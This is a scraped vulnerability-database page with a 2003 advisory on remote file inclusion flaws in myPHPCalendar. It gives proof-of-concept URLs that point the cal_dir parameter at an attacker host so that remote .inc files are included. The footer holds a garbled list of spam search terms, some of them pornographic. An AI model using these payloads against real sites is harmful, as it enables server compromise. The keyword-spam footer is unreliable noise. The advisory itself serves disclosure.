about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Multiple myPHPCalendar File Include Vulnerabilities


Title Multiple myPHPCalendar File Include Vulnerabilities
Published 2003-10-13-12:00AM
Updated 2003-10-13-06:32PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability has been credited to "Frog Man" <leseulfrog@hotmail.com>.
Vulnerable  myPHPCalendar myPHPCalendar 10192k Build 1 Beta
Not Vulnerable  
Code   The following proof of concept has been supplied:

http://www.example.com/admin.php?cal_dir=http://[attacker]/
http://www.example.com/contacts.php?cal_dir=http://[attacker]/
http://www.example.com/convert-date.php?cal_dir=http://[attacker]/

will include the files :

http://[attacker]/vars.inc and/or http://[attacker]/prefs.inc

and http://www.example.com/index.php?cal_dir=http://[attacker]/ will include the
files :
http://[target]/globals.inc http://[target]/sql.inc
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 19:13:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.cnlmzx Animaltoan porono sex Bangladess components Sabdrimer vuln/explo components Animaltoan putih phpAnyVote 200 /compo xayf.com.c maxcpm.inf 445 dos Blue image Remote Com Tagger LE. skulmatic t10 t Bangladess Tagger LE. www.xingda http://www www.tamila www.sw0318 www....sex phpBB por ms0635 /?path[doc wanyule.cn www.gzdo.c search/exp Tagger LE. 8.1 51-sf.com. Tagger LE. DNSTools Badgirls hot sex porno izle Www.bluapp www.cdyzcm administra tamil teen icq 2003b hp laserje Www.bluapp maxcpm.inf php-nuke+2